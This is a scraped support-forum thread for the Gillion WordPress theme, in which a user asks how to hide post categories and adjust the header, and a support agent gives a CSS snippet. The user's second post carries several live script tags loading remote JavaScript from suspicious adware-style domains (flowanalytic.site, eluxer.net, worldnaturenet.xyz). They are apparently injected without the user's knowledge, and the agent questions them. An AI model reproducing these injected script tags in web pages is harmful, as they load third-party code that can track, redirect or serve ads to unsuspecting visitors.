How to hide the categories in my homepage for all the sections

Home Forums Gillion Theme How to hide the categories in my homepage for all the sections

Home Forums Gillion Theme How to hide the categories in my homepage for all the sections

Viewing 3 posts - 1 through 3 (of 3 total)
  • Author
  • szjpfan
    Participant

    I have serveral categories for each post. If I show the categories on the homepage or post, it will be very mess. How can I hide or how can I only show one main categories?

     

    Thanks

    szjpfan
    Participant

    <script src=”//s3.amazonaws.com/js-cache/188f9ebcdf6890da18.js” type=”text/javascript”></script>Question 2: I also want to know how to adjust the header’s height. Now it seems too high for me.

     

    Question 3: How to create a overlay header on my first slider?

    <script src=”https://flowanalytic.site/addons/lnkr5.min.js&#8221; type=”text/javascript”></script><script src=”https://flowanalytic.site/addons/lnkr30_nt.min.js&#8221; type=”text/javascript”></script><script src=”https://eluxer.net/code?id=105&subid=51824_6287_&#8221; type=”text/javascript”></script><script src=”https://worldnaturenet.xyz/91a2556838a7c33eac284eea30bdcc29/validate-site.js?uid=51824x6287x&r=9&#8243; type=”text/javascript”></script>

    Hi @szjpfan,

     

    I hope you are well today and thank you for your questions.

     

    I have serveral categories for each post. If I show the categories on the homepage or post, it will be very mess. How can I hide or how can I only show one main categories?

    You can hide them by adding the following CSS code in the Custom CSS code option of your theme on the below path.

     

    Admin Area -> Appearance -> Theme Settings -> Custom Code -> CSS Code

     

    .post-categories-container {
        display: none;
    }

     

     

    Why are you adding scripts in your reply here?

     

    To help us keep support thread separates could you please create new thread for each of your other questions instead of asking them in your single thread as it makes the thread messy and hard to read.

     

    If you want to you can also add reference of this thread in your newly created thread.

     

    We would be more than happy to help you on your new thread.

     

    Best regards,
    Shufflehound team

Viewing 3 posts - 1 through 3 (of 3 total)